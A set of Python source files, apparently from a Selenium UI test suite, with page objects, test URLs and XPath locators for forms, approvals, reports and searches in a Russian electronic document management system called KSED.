punktBtnVipolnit = PageElement(xpath=KSEDLocators.punktBtnVipolnit) # Создать и заполнить
# ПРОТОКОЛ
#(форма создания документа)
date = PageElement(xpath=KSEDLocators.date) # Дата совещания
category = PageElement(xpath=KSEDLocators.category) # Категория
Chairman = PageElement(xpath=KSEDLocators.Chairman) # Председатель
Secretary = PageElement(xpath=KSEDLocators.Secretary) # Секретарь
person_present = PageElement(xpath=KSEDLocators.person_present) # Присутствовали
#РЕЕСТР
#(форма создания документа)
vid_reestra = PageElement(xpath=KSEDLocators.vid_reestra) # Вид реестра
vid_reestraPR = PageElement(xpath=KSEDLocators.vid_reestraPR) # Вид реестра (Передачи на рег..)
vid_reestraPP = PageElement(xpath=KSEDLocators.vid_reestraPP) # Вид реестра (Приема/передачи)
btnCreateChern = PageElement(xpath=KSEDLocators.btnCreateChern) # Кнопка "Создать черновик"
btnCreateSend = PageElement(xpath=KSEDLocators.btnCreateSend) # Кнопка "Создать и отправить"
inpDoc = PageElement(xpath=KSEDLocators.inpDoc) # Поле "Документы"
poluchatel = PageElement(xpath=KSEDLocators.poluchatel) # Поле "Получатель"
# СЛУЖЕБНАЯ ЗАПИСКА
#(форма создания документа)
adresati = PageElement(xpath=KSEDLocators.adresati) # Адресаты
podpisanti = PageElement(xpath=KSEDLocators.podpisanti) # Подписанты
# ПРОИЗВОЛЬНЫЙ ДОКУМЕНТ
#(форма создания документа)
prorabotka = PageElement(xpath=KSEDLocators.prorabotka) # Проработка
chBprorab = PageElement(xpath=KSEDLocators.chBprorab) # чекбокс проработка
normokontrol = PageElement(xpath=KSEDLocators.normokontrol) # Нормоконтроль
chBnorm = PageElement(xpath=KSEDLocators.chBnorm) # чекбокс Проработка
soglasovanie = PageElement(xpath=KSEDLocators.soglasovanie) # Согласование
podpisanie = PageElement(xpath=KSEDLocators.podpisanie) # Подписание
utverzhdenie = PageElement(xpath=KSEDLocators.utverzhdenie) # Утверждение
oznakomlenie = PageElement(xpath=KSEDLocators.oznakomlenie) # Ознакомление
# ПОРУЧЕНИЕ
# (форма создания документа)
tipPoruch = PageElement(xpath=KSEDLocators.tipPoruch) # Тип поручения
text_poruch = PageElement(name=KSEDLocators.text_poruch) #Текст поручения
otvetstv_ispoln = PageElement(xpath=KSEDLocators.otvetstv_ispoln) # Ответственный исполнитель
# ПАКЕТ ВХОДЯЩЕЙ КОРРЕСПОНДЕНЦИИ
# ВХОДЯЩИЙ ДОКУМЕНТ
#(форма создания документа)
ishNumber = PageElement(name=KSEDLocators.ishNumber) # Исходящий номер
dateIS = PageElement(xpath=KSEDLocators.dateIS) # Дата исходящего
# ИСХОДЯЩИЙ ДОКУМЕНТ
# (форма создания документа)
osnovPodpis = PageElement(name=KSEDLocators.osnovPodpis) # Основание подписания
korrespondentISH = PageElement(xpath=KSEDLocators.korrespondentISH) # Корреспондент
clickNull = PageElement(xpath=KSEDLocators.clickNull) # КЛИК ВНЕ АТРИБУТОВ
#Формы отчетов
#Мои поисковые запросы
listChange = PageElement(xpath=KSEDLocators.listChange) # Выпадающий список
listChangeSZ = PageElement(xpath=KSEDLocators.listChangeSZ) # Выпадающий список - служебная записка
listChangeRD = PageElement(xpath=KSEDLocators.listChangeRD) # Выпадающий список - РД
butSave = PageElement(xpath=KSEDLocators.butSave) #Кнопка сохранить
nameZap = PageElement(xpath=KSEDLocators.nameZap) #Наименование запроса
zaprosToDel = PageElement(xpath=KSEDLocators.zaprosToDel)#созданный запрос
butDel = PageElement(xpath=KSEDLocators.butDel) #Кнопка удалить
butRed = PageElement(xpath=KSEDLocators.butRed) # Кнопка редактировать
butDelAc = PageElement(xpath=KSEDLocators.butDelAc) # Кнопка удалить подтверждение
butAct = PageElement(xpath=KSEDLocators.butAct) # Кнопка "Действия с выбранными"
butAct_2 = PageElement(xpath=KSEDLocators.butAct_2) # Кнопка "Действия с выбранными"
butExp = PageElement(xpath=KSEDLocators.butExp) # Кнопка экспорта
butExp_2 = PageElement(xpath=KSEDLocators.butExp_2) # Кнопка экспорта
checkBoxFirst = PageElement(xpath=KSEDLocators.checkBoxFirst) # Первый чекбокс в списке
butFavorite = PageElement(xpath=KSEDLocators.butFavorite) # Кнопка добавить в избранное
butOK = PageElement(xpath=KSEDLocators.butOK) #Кнопка OK добавить в избранное
butSelExp = PageElement(xpath=KSEDLocators.butSelExp) # Кнопка экспорта выбранного
--- FILE SEPARATOR ---
class dataTest:
# baseURL = 'http://172.30.48.50:8080/share/page/arm?code=SED' # Базовый URL
# baseURL = 'http://172.30.48.48:8080/share/page/arm?code=SED' # Базовый URL
baseURL = 'http://172.30.48.40:8080/share/page/arm?code=SED' # Базовый URL
#baseURL = 'http://172.30.48.49:8080/share/page/arm?code=SED' # Базовый URL
#baseURL = 'http://172.30.48.41:8000/share/page/arm?code=SED'
BARCODE = '5387445' #469958, ШК документа, для поиска и добавления документов( например при создании реестра нужен ШК дока)
--- FILE SEPARATOR ---
# Извлечение номера документа из файла
# def rFile():
#
# my_file = open("D:\PyTestKSED\KSED\TestData\linkDoc.txt", "r")
# my_string = my_file.read()
# my_string.strip()
# return my_string
# my_file.close()
#
# def rFileRD():
#
# my_file = open("D:\PyTestKSED\KSED\TestData\linkDocRD.txt", "r")
# my_string = my_file.read()
# my_string.strip()
# return my_string
# my_file.close()
# #
# # my_file = open("tempDoc.txt")
# # my_string = my_file.read()
# # my_string.strip()
# #
# # locator = str("'//a[text() = ") + '"' + str(my_string) + '"]' + "'"
# # return (locator)
# #
# # my_file.close()
#
#
class KSEDLocators:
#
# # Ссылка на документ
# LinkDoc = rFile()
# LinkDocRD = rFileRD()
# Форма авторизации
username_text = 'username' # name
password_text = 'password' # name
LogIn_button = '//span/button' # xpath
# *******СТРОКА МЕНЮ*******
ksed = '(//a[contains(@title, "КСЭД")])[1]' #xpath # КСЭД
barcode_search = 'SEARCH_BARCODE_text' #id # Поиск по ШК
search_bc = '//input[contains(@id, "search_bc")]' #xpath # Строка поиска по ШК
more_menu = 'LOGIC_ECM_MORE_MENU_BAR' #id # Меню "Ещё"
ksed_in_more_m = 'SED_MENU_ITEM_ADDITIONAL_text' #id # КСЭД в меню "Ещё"
Company_dir = '//a[contains(@title, "Справочник организации")]' #xpath # Справочник организации
admin = '//a[contains(@title, "Администрирование")]' #xpath # Администрирование
transfer = '//a[contains(@title, "Передача дел")]' #xpath # Передача дел
arm_arh = '//a[contains(@title, "Передача дел")]' #xpath # АРМ Архивное дело
verify = '//a[contains(@title, "Верификация")]' #xpath # Верификация
scanner = '//a[contains(@title, "Верификация")]' #xpath # Работа со сканером ШК
notification = 'NOTIFICATIONS_text' #id # Уведомления
notificationProtokol = '(//a[contains(text(), "Протокол:")])[1]' #xpath # Первое в списке уведомление о протоколе
notificationFirst = '(//span[@class = "detail"]/a)[1]' #id # Уведомление первое в списке
# *******МЕНЮ ПОЛЬЗОВАТЕЛЯ*******
user_menu = '//span[@id="HEADER_USER_MENU_POPUP_text"]' #xpath # Меню пользователя
USER_LOGOUT = '//td[@id="HEADER_USER_MENU_LOGOUT_text"]' #xpath # Выход из системы
my_profile = '//a[text() = "Мой профиль"]' # xpath # Пункт меню "Мой профиль"
fieldlabel = '//div[@class = "fieldlabel"]' #xpath # Должность в области краткой информации
btnEdit_profile = '//button[contains(@id, "button-edit-button")]' #xpath # Кнопка "Изменить профиль"
inputPosition = '//input[contains(@id, "-input-jobtitle")]' #xpath # Поле ввода должности
logic_ESM = '//a[text() = "Логика ECM. Мой профиль"]' # xpath # Пункт меню "Логика ECM. Мой профиль"
autoAnswerText = 'prop_lecm-absence_auto-answer-text' #name # Текст автоответа (Меня нет в офисе)
btnCancelAbsence = '//button[contains(@id, "cancelButton-button")]' #xpath # Кнопка "Отменить отсутствие"
btnYes = '//button[text() = "Да"]' #xpath # Кнопка "Да" (отменить отсутствие)
edit_password = '//a[text() = "Изменить пароль"]' #xpath # Пункт меню "Изменить пароль"
inputOldPassword = '//input[contains(@id, "oldpassword")]' #xpath # Введите старый пароль
inputNewPassword1 = '//input[contains(@id, "newpassword1")]' # xpath # Введите старый пароль
inputNewPassword2 = '//input[contains(@id, "newpassword2")]' # xpath # Введите старый пароль
btnOKchange = '//button[contains(@id, "_default-bu")][text() = "ОК"]' #xpath # Кнопка "Изменить пароль"
# *******ЛЕВАЯ ЧАСТЬ СТРАНИЦЫ (Кнопка "Создать" и разделы)*******
newDoc_button = '//button[contains(@id, "newDocumentButton-button")]' #xpath # "Создать"
protocol = '//a[contains(@class, "hassubmenu")][contains(text(), "Протокол")]' #xpath # Протокол
rd = '//a[contains(@class, "hassubmenu")][contains(text(), "Распорядительный документ")]' #xpath # РД
reestr = '//a[contains(text(), "Реестр")]' #xpath # Реестр
poruchenie = '//a[contains(text(), "Поручение")]' #xpath # Поручение
cardSogl = '//a[contains(text(), "Карточка согласования")]' # xpath # Карточко согласования
resolution = '//a[contains(@class, "hassubmenu")][contains(text(), "Резолюция")]' #xpath # Резолюция
SZ = '//a[contains(@class, "hassubmenu")][contains(text(), "Служебная записка")]' #xpath # Служебная записка
proizvDoc = '//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Произвольный документ")]' # xpath Произвольный документ
paket_vh = '//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Пакет входящей корреспонденции")]' #xpath #Пакет Вх. кор.
vhDoc = '//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Входящий документ")]'
ishDoc = '//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Исходящий документ")]'
# РАЗДЕЛЫ
myWork = '//div[contains(text(), "Моя работа")]' #xpath # Моя работа
expedition = '//div[contains(text(), "Экспедиция")]' #xpath # Экспедиция
navigation = '//div[contains(text(), "Навигатор")]' #xpath # Навигатор
allur = '//div[contains(text(), "Отчеты")]' #xpath # Отчеты
workReg = '//div[contains(text(), "Работа регистратора")]' #xpath # Работа регистратора
medo = '//div[contains(text(), "МЭДО")]' #xpath # МЭДО
mySearch = '//div[contains(text(), "Мои поисковые запросы")]' #xpath # Мои поисковые запросы
poiskzapr = '//span[text() = "Поисковые запросы"]' #xpath # Поисковые запросы
myPoiskZapr = '//td[contains(@id, "ygtvcontente")]/span[text() = "2"]' #xpath # Поисковые запросы
ControlZapr = '//span[text() = "Управление поисковыми запросами"]' #xpath # Управление поисковыми запросами
btnPlus = '(//a[@class = "ygtvspacer"])[14]' #кнопка развернуть в моих запросах
# ОБЛАСТЬ ПРОСМОТРА (КСЭД)
oblProsm = '(//div[contains(@id, "_default-body")][contains(@class, "datagrid")])[2]' #xpath # Область просмотра
full_text_search = '(//input[contains(@id, "_default-full-text-search")])[1]' #xpath # Поисковая строка
oneDocInList = '(//a[contains(@href, "document?nodeRef=workspace")])[1]' #xpath # Первый документ в списке
nineDocInList = '(//a[contains(@href, "document?nodeRef=workspace")])[9]' # xpath # Девятый документ в списке
subordinate = '//span[@class = "expand-table-icon"]' #xpath # "+" раскрытие подчиненные документы
oneSubordInList = '(//a[contains(@href, "document?nodeRef=workspace")]' \
'[not(contains(@href, "/d"))])[1]' #xpath # Первая ссылка на подчиненный документ
ActionTab = '//span[contains(@class, "group-actions-counter")]' #xpath # Кнопка "Действия с выбранными"
chBinOnl = '//input[contains(@id, "_default-select-all-records")]'#'//input[@name = "fileChecked"][3]'
# Моя работа
WorkImmid ='//span[text() = "Срочные"]'#xpath # раздел срочные
connectedDoc = '(//h2[contains(@id, "alf-")])[6]' #xpath # связанные документы
# ОТЧЕТЫ
section_allur = '//div[contains(@id, "ac-head")][contains(text(), "Отчеты")]' #xpath # Раздел "Отчеты"
node_Logs = '//span[contains(text(), "Журналы")]'#xpath # "Журналы"
node_Statis = '//span[contains(@class, "ygtvlabel")][contains(text(), "Статистические")]'#xpath # "Статистические отчеты"
edsBykindStat = '//a[contains(@onclick, "eds-by-kind-stat")]' #xpath # Отчет "Сводка по видам документов"
node_ispDisp = '//div[contains(@class, "shown")]//span[contains(text(), "Отчеты по исполнительской дисциплине")]'#'//span[contains(text(), "Отчеты по исполнительской дисциплине")]' #xpath
logs_incDoc = '//a[contains(text(), "Журнал регистрации входящих документов")]' #xpath
incomingRegJournal = '//a[contains(@onclick, "incoming-reg-journal")]' #xpath # Отчет "Журнал регистрации входящих документов"
logs_outDoc = '//a[contains(text(), "Журнал регистрации исходящих документов")]' #xpath
outgoingRegistration = '//a[contains(@onclick, "outgoing-registration")]' # xpath # Отчет "Журнал регистрации исходящих документов"
logs_raspDoc = '//a[contains(text(), "Журнал регистрации Распорядительных документов")]' #xpath
ordRegJournal = '//a[contains(@onclick, "ord-reg-journal")]' # xpath # Отчет "Журнал регистрации Распорядительных документов"
logs_sluDoc = '//a[contains(text(), "Журнал Регистрации служебных записок")]' #xpath
internalRegJournal = '//a[contains(@onclick, "internal-reg-journal")]' # xpath # Отчет "Журнал регистрации служебных записок"
stat_specDoc = '//a[contains(text(), "Сводка по видам документов")]' #xpath
edsBykindStat = '//a[contains(@onclick, "eds-by-kind-stat")]' # xpath # Отчет "Сводка по видам документов"
stat_temDoc = '//a[contains(text(), "Сводка по тематикам документов")]' #xpath
edsBySubjectStat = '(//a[contains(@onclick, "eds-by-subject-stat")])[1]' #xpath # Отчет "Сводка по тематикам документов"
stat_temDocO = '//a[contains(text(), "Сводка по тематикам документов (объедин.)")]' #xpath
edsBySubjectStatO = '(//a[contains(@onclick, "eds-by-subject-stat")])[2]' # xpath # Отчет "Сводка по тематикам документов(объед)"
stat_tipDoc = '//a[contains(text(), "Сводка по типам документов")]' #xpath
edByTypeStat = '//a[contains(@onclick, "eds-by-type-stat")]' #xpath # Отчет "Сводка по типам документов"
allu_ispIncDoc = '//a[contains(text(), "Исполнение входящих документов")]' #xpath
allu_raspDoc = '//a[contains(text(), "Исполнение распорядительного документа")]' #xpath
allu_sluDoc = '//a[contains(text(), "Исполнение служебных записок")]' #xpath
allu_ispDis = '//a[contains(text(), "Исполнительская дисциплина по авторам")]' #xpath
allu_ispDispA = '//a[contains(text(), "Исполнительская дисциплина по исполнителям")]' #xpath
allu_NispDI = '(//a[contains(text(), "Неисполненные поручения с истекшим сроком")])[1]' #xpath
allu_NispDIrg = '//a[contains(text(), "Неисполнительные поручения с истекшим сроком РГ")]' #xpath
allu_istS = '//a[contains(text(), "Поручения с истекающим сроком")]' #xpath
allu_narS = '//a[contains(text(), "Поручения, исполненные с нарушением срока")]' #xpath
allu_prodIsp = '//a[contains(text(), "Продуктивность по Исполнителям")]' #xpath
allu_prodPodr = '//a[contains(text(), "Продуктивность по Подразделениям")]' #xpath
allu_ReesContr = '//a[contains(text(), "Реестр для закрытия неактуальных контрольных поручений")]' #xpath
allu_ReesContrN = '//a[contains(text(), "Реестр неисполнительных контрольных поручений")]' #xpath
allu_ReesContrF = '//a[contains(text(), "Реестр фактически исполненных контрольных поручений")]' #xpath
allu_SostIspR = '//a[contains(text(), "Состояние исполнения резолюций")]' #xpath
# *******РАБОТА С ДОКУМЕНТОМ*******
# ОБЩИЕ АТРИБУТЫ
#(форма создания документа)
title = 'prop_lecm-document_title' # name # Заголовок
category_doc = '//input[contains(@id, "-category-assoc-cntrl-autocomplete-input")]' # xpath # Категория документа
doc_type = '//button[contains(@id, "type-assoc-cntrl-tree-picker-button-button")]' #xpath # Вид документа(кнопка выбора)
doc_typeInp = '//input[contains(@id, "type-assoc-cntrl-autocomplete-input")]' #xpath # Вид документа(поле ввода)
btnOKDT = '//button[contains(@id, "type-assoc-cntrl-ok-button")]' # xpath # Вид документа (кнопка "ОК")
podpisant = '//input[contains(@id, "signerEmployeeAssoc-cntrl-autocomplete-input")]' # xpath # Подписант(ы)
sposob_dost = '//input[contains(@id, "_delivery-method-assoc-cntrl-autocomplete-input")]' # xpath # Способ доставки
btnCreateDoc = '//button[contains(@id, "_default-form-submit-button")]' # xpath # Кнопка "Создать"
adresat = '//input[contains(@id, "_recipient-assoc-autocomplete")]' # xpath # Адресат
korrespondent = '//input[contains(@id, "sender-assoc-autocomplete")]' # xpath # Корреспондент
# (карточка документа)
attachments = '//span[contains(@id, "action-expand")][contains(@class, "attachments-expand")]' #xpath # Переход во вкладку "Вложения"
vlozheniya = '//h2[contains(@id, "heading")][contains(text(), "Вложения")]' # xpath # Вложения (раскрытие раздела)
remarks = '//h2[contains(string(), "Замечания и внутреннее согласование")]'# xpath # замечания
remarksBtn = '//span[contains(@id, "yui")][contains(@class, "rn-approval-dashlet-expand")]'
osnSvedeniya = '//h2[contains(@id, "heading")][contains(text(), "Основные сведения")]' #xpath # Основные сведения (раскрытие раздела)
printForm = '//h2[contains(@id, "heading")][contains(text(), "Печатные формы")]' #xpath # Печатные формы (раскрытие раздела)
printBarCode = '//a[contains(text(), "Штрих-код документа")]' #xpath #Печатная форма штрих кода документа
btnPrintInPrintForm = 'print' #id # Кнопка печати в окне печатной формы
mode = '//button[contains(@id, "default-cntrl-split-panel-button-button")]' #xpath
fileUpload = '(//button[contains(@id, "fileUpload-button-button")])[2]' #xpath # Загрузить файл
fileUpload2 = '//button[contains(@id, "fileUpload-button-button")]' # xpath # Загрузить файл в поручении
fileUpload3 = '//button[contains(@class, "file-selection-button")]' #xpath # Выбрать файл
fileUpload4 = '(//button[contains(@id, "-upload-button-button")])[1]'#xpath # загузить файл
files = '//input[@type="file"][@name="files[]"]' #xpath # Выберите файлы
show = '//a[contains(@id, "action-show-main")]' #xpath # Показать общую карточка
show_list = '//a[@class = "preview-show-list"]' #xpath # Показать ввиде списка
btnPrint = '//button[contains(@id, "print_from_preview")]' #xpath # Кнопка печати в форме предварительного просмотра вложения
btnOKpodpis = '(//button[text() = "ОК"])[1]' #xpath # Кнопка ОК подтверждение подписания (//em[text() = "Согласование"])[2]
dropBtn = '(//span[contains(@class, "expand-table-icon")])[2]' #xpath # Кнопка открыть выпадающий список
dropBtn_2 = '(//span[contains(@class, "expand-table-icon")])[1]' #xpath # Кнопка открыть выпадающий список
#dropBtn_2 = '(//a[contains(@title, "Раскрыть все этапы")])[1]' #xpath # Кнопка открыть выпадающий список
resultSogl = '//td[contains(@class, "StageItemStatus")]' # xpath # результат соглаоования
soglasovanieWkladka = '//em[contains(text(), "Согласование")]' # xpath # Вкладка "Согласование"
soglasovanieWkladka2 = '(// em[text() = "Согласование"])[2]' # xpath # Вкладка "Согласование"
createRuleBtn = '//button[contains(@id, "create-approval-list-button-button")]' # xpath # Кнопка "Создать маршрут"
createRuleIndivid = '//a[text() = "Индивидуальный маршрут"]' #xpath # "Индивидуальный маршрут" (//a[text() = "Типовой"])[1]
createRuleTypical = '(//a[text() = "Типовой"])[1]' #xpath # "Типовой маршрут"
addEtap = '//button[contains(@id, "cntrl-add-stage-button")]' #xpath # Кнопка "Добавить этап"
tipeEtap = '//input[contains(@id, "type-cntrl-autocomplete-input")]' #xpath # "Вид этапа"
soglasuychie = '//input[contains(@id, "approvers-autocomplete")]' #xpath # "Согласующие"
btnOKformSogl = '//button[contains(@id, "form-submit-button")]' #xpath # Кнопка "ОК" на форме добавления этапа согласования
btnTree = '//span[contains(@class, "-push-button")][contains(@id, "type-cntrl-tree-picker-button")]' #xpath # Кнопка ...
btnSelection_1 = '(//span[contains(@class, "addIcon")])[1]' # xpath # Кнопка + первый выбор
btnSelection1 = '(//i[contains(@class, "icon-plus")])[1]' # xpath # Кнопка + первый выбор
btnSelection3 = '(//span[contains(@class, "addIcon")])[3]' # xpath # Кнопка + третий выбор
btnSelection_3 = '(//i[contains(@class, "icon-plus")])[3]' # xpath # Кнопка + третий выбор#
btnSelection_4 = '(//span[contains(@class, "addIcon")][contains(@id, "yui-gen")])[7]' # xpath # Кнопка + 4 выбор
btnSelection_5 = '(//span[contains(@class, "addIcon")])[5]' # xpath # Кнопка + 27 выбор
punkti = '//em[contains(text(), "Пункты")]' #xpath # Вкладка "Пункты"
punktiBtn = '//button[contains(@id, "create-point-button")]' #xpath # Кнопка "Пункты"
punktPoruch = '(//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Поручение")])[1]' #xpath # Пункт/Поручение
textPoruch = '//textarea[contains(@id, "ts_point-desc")]' #xpath # Текст поручения
tipPoruch = '//input[contains(@id, "type-assoc-cntrl-autocomplete-input")]' # xpath # Тип поручения
otvetstv_ispolnVpunktah = '//input[contains(@id, "_executor-assoc-cntrl-autocomplete-input")]' # xpath # Ответственный исполнитель в пунктах карточки документа
srokIspoln = '//input[contains(@id, "ts_limitation-date-cntrl-date")]' #xpath # Срок исполнения (среднее знач)
btnOKform = '//button[contains(@id, "form-submit-button")]' #xpath # Кнопка ОК на форме
addPunkt = '(//button[@title = "Добавить пункт"])[1]' #xpath # Кнопка "Добавить пункт"
textPunktaRD = 'prop_lecm-ord-table-structure_item-content' #name # Текст пункта РД
rassilka = '//em[text() = "Рассылка"]' #xpath # Вкладка "Рассылка"
btnVipolnit = '(//button[contains(@id, "create-mailing-list-button-button")])[1]' # xpath # Кнопка "Создать маршрут"
punktBtnVipolnit = '//a[text() = "Создать и заполнить указатель"]' #xpath # Создать и заполнить
otvetstv_ispolnVpunktahRD = '//input[contains(@id, "executor-assoc-cntrl-autocomplete-input")]' #xpath # Ответственный исполнитель в пункте РД
#(Функциональное меню "Действия")
#Согласовать
sendFor_approval = '//div[contains(text(), "Направить на согласование")]' #xpath # Действие "Направить на согласование"
sendFor_podpis = '//div[contains(text(), "Направить на подписание")]' # xpath # Действие "Направить на подписание"
sendFor_execution = '//div[contains(text(), "Направить на исполнение")]' # xpath # Действие "Направить на исполнение"
btnOKnaprNaIspoln = '//button[text() = "ОК"]' #xpath # Кнопка "ОК" на форме подтверждения действия "Направить на исполнение"
confirm = '(//button[contains(@id, "-button")][text() = "ОК"])[1]' #xpath # Подтверждение согласования
confirm2 = '(//button[contains(@id, "-button")][text() = "ОК"])' # xpath # Подтверждение согласования
confirm_3 = '(//button[contains(@id, "-button")][text() = "ОК"])[4]' # xpath # Подтверждение согласования
confirm_4 = '//button[contains(@id, "-reportForm-form-submit-button")]' # xpath # Подтверждение согласования
confirm_5 = '(//button[contains(@id, "-button")][text() = "ОК"])[2]'# xpath # Подтверждения выбора
confirm_6 = '(//button[contains(@id, "rn-document-approval_document-kind-assoc-cntrl-ok-button")])' # xpath # Подтверждения выбора
confirm_7 = '(//button[contains(@id, "document-approval_pvu-assoc-cntrl-ok-button")])' # xpath # Подтверждения выбора
confirm_8 = '(//button[contains(@id, "document-approval_lnd-kind-assoc-cntrl-ok-button")])' # xpath # Подтверждения выбора
confirm_9 = '//button[contains(@id, "workflow-form-form-submit-button")][text() = "ОК"]' # xpath # Подтверждение согласования
#"Отправить отчет"
actionSendAllere = '//div[text() = "Отправить отчет"]' #xpath # "Отправить отчет" действие
btnSend = '//button[text() = "Отправить"]' #xpath # Кнопка "Отправить"
textAllur = '//textarea[contains(@name, "_execute_1ReportText")]' #xpath # Текстовое поле "Текст отчета"
btnAddSvyz = '//button[contains(@id, "tree-picker-button-button")]' #xpath # Кнопка добавления связи "..."
searchDoc = '//input[contains(@id, "picker-searchText")]' #xpath # Строка поиска в форме подбора
oneListEl = '(//span[@class = "addIcon"])[1]' # xpath # Первый элемент в списке справочника
btnOK = '//button[contains(@id, "-ok-button")]' #xpath # Кнопка "ОК" в форме подбораsaveProject
status_Doc = '//span[contains(@id, "_status")]' #xpath # Статус документа во вкладке (Основные сведения) (//div[text() = "Не начат"])[1]
status_Doc_1 = '(//span[contains(@id, "_status")])[1]' #xpath # Статус документа во вкладке (Основные сведения)
status_etap = '(//div[text() = "Не начат"])[1]' # xpath # Статус документа во вкладке (Основные сведения)
# (панель согласования)
APPROVED_button = '//button[contains(@id, "APPROVED-button")]' #xpath # Кнопка "Согласовать"
APPROVED_WITH_REMARK_button = '//button[contains(@id, "APPROVED_WITH_REMARK-button")]' #xpath # Кнопка "Согласовать с комментариями"
REJECTED_button = '//button[contains(@id, "REJECTED-button")]' #xpath # Кнопка "Отклонить"
internal_approval = '//button[contains(@id, "internal_approval-button")]' #xpath # Кнопка "Внутреннее согласование"
prop_bpm_comment = '//textarea[contains(@class, "invalid")]' #name # Поле комментария prop_bpm_comment
prop_bpm_comment_sogl = '//textarea[contains(@id, "form_prop_bpm_comment")]' # Поле комментария
apply_button_button = '//button[contains(@id, "apply-button")]' #xpath # Кнопка "ОК" при вынесении решения согласования
apply_button_button2 = '//span[@class = "button-group"]//button[contains(@id, "-button") and text() = "ОК"]' #xpath # Кнопка "ОК" при вынесении решения согласования
SIGNED_button = '//button[contains(@id, "SIGNED-button")]' #xpath # Кнопка "Подписать"
navedenieSogl = '(//div[contains(text(), "Внутреннее согласование")])[1]' #xpath # наведение на этап согласования
# # ПРОТОКОЛ
# #(форма создания документа)
# addEl = '(//span[@class="addIcon"])[7]' #xpath # Вид документа(Протокол совещания рабочей группы)
# addEl2 = '(//span[@class="addIcon"])[6]' #xpath Вид документа "Служебная записка"
# РАСПОРЯДИТЕЛЬНЫЙ ДОКУМЕНТ
#(форма создания документа)
preambula = '//textarea[contains(@id, "-eds-document_summaryContent")]' #xpath # Преамбула
obcontrol = '//input[contains(@id, "-ord_controller-assoc-cntrl-autocomplete-input")]' #xpath # Общий контроль
wid_doc = '(//select[contains(@id, "_assoc_lecm-eds-document_document-type-assoc")])[1]' #xpath # Вид документа (в РД)
wid_doc_rasp = '//option[contains(text(), "Распоряжение")]' #xpath # Вид документа РД (Распоряжение)
# ПРОТОКОЛ
#(форма создания документа)
addEl = '(//span[@class="addIcon"])[7]' #xpath # Вид документа(Протокол совещания рабочей группы)
addEl2 = '(//span[@class="addIcon"])[6]' #xpath Вид документа "Служебная записка"
date = '//input[contains(@id, "_meeting-date-cntrl-date")]' #xpath # Дата совещания
category = '//input[contains(@id, "_category-assoc-cntrl-autocomplete-input")]'#xpath # Категория
Chairman = '//input[contains(@id, "chairman-assoc-cntrl-autocomplete-input")]'#xpath # Председатель
Secretary = '//input[contains(@id, "_secretary-assoc-cntrl-autocomplete-input")]'#xpath # Секретарь
person_present = '//input[contains(@id, "_attended-assoc-cntrl-autocomplete-input")]'#xpath # Присутствовали
#(карточка документа)
#РЕЕСТР
#(форма создания документа)
vid_reestra = '//select[contains(@id, "_document-registry_type")]' #xpath # Вид реестра
vid_reestraPR = '//option[contains(text(), "Передачи на регистрацию")]' #xpath # Вид реестра (Передачи на рег..)
vid_reestraPP = '//option[contains(text(), "Приема/передачи")]' #xpath # Вид реестра (Приема/передачи)
btnCreateChern = '//button[contains(text(), "Создать черновик")]' #xpath # Кнопка "Создать черновик"
btnCreateSend = '//button[contains(text(), "Создать и отправить")]' # Кнопка "Создать и отправить"
inpDoc = '//input[contains(@id, "registry_doc-assoc-cntrl-autocomplete-input")]' #xpath # Поле "Документы"
poluchatel = '//input[contains(@id, "document-registry_receiver-assoc-autocomplete")]' #xpath # Поле "Получатель"
# СЛУЖЕБНАЯ ЗАПИСКА
#(форма создания документа)
adresati = '//input[contains(@id, "internal_recipients-assoc-autocomplete")]'#xpath # Адресаты
podpisanti = '// input[contains( @ id, "aspects_signerEmployeeAssoc-cntrl-autocomplete")]' #xpath # подписантф
# ПРОИЗВОЛЬНЫЙ ДОКУМЕНТ
#(форма создания документа)
prorabotka = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[1]'#xpath # Проработка
chBprorab = '(//input[contains(@class, "formsCheckBox")])[1]' #xpath # чекбокс проработка
normokontrol = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[2]'#xpath # Нормоконтроль
chBnorm = '(//input[contains(@class, "formsCheckBox")])[2]' #xpath # чекбокс Проработка
soglasovanie = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[3]'#xpath # Согласование
podpisanie = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[4]'#xpath # Подписание
utverzhdenie = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[5]'#xpath # Утверждение
oznakomlenie = '(//input[contains(@id, "_status-employee-assoc-cntrl-autocomplete-input")])[7]'#xpath # Ознакомление
# ПОРУЧЕНИЕ
# (форма создания документа)
text_poruch = 'prop_lecm-errands_content' # name #Текст поручения
otvetstv_ispoln = '//input[contains(@id, "executor-assoc-autocomplete")]'#xpath # Ответственный исполнитель
# ПАКЕТ ВХОДЯЩЕЙ КОРРЕСПОНДЕНЦИИ
# ВХОДЯЩИЙ ДОКУМЕНТ
#(форма создания документа)
ishNumber = 'prop_lecm-incoming_outgoing-number' #name # Исходящий номер
dateIS = '//input[contains(@id, "-incoming_outgoing-date-cntrl-date")]' # xpath # Дата исходящего
# ИСХОДЯЩИЙ ДОКУМЕНТ
#(форма создания документа)
osnovPodpis = 'prop_lecm-outgoing_signing-basis' #name # Основание подписания
korrespondentISH = '//input[contains(@id, "contractor-assoc-autocomplete")]' #xpath # Корреспондент
clickNull = '//div[contains(@id, "_default-form-container")]' # КЛИК ВНЕ АТРИБУТОВ
# Мои поисковые Запросы
listChange = '//select[contains(@id, "default_searchQuery-selectType-entry")]' #Выпадающий список
listChangeSZ = '//option[text() = "Служебная записка"]' #Выпадающий список - служебная записка
listChangeRD = '//option[text() = "Распорядительный документ"]' # Выпадающий список - РД
butSave = '//div[contains(@class, "query-button-grey")][3]' #Кнопка сохранить
nameZap = '//input[contains(@id, "createDetails_prop_lecm-search-queries_name")]' #Наименование запроса
zaprosToDel = '//span[text() = "ToDel"]'#созданный запрос
butDel = '//span[contains(@class, "yui-button yui-push-button")]//button[text() = "Удалить поисковый запрос"]' #Кнопка удалить
butRed = '//span[contains(@class, "yui-button yui-push-button")]//button[text() = "Редактировать поисковый запрос"]' #Кнопка редактировать
butDelAc = '//span[contains(@class, "first-child")]//button[text() = "Удалить"]' #Кнопка удалить подтверждение
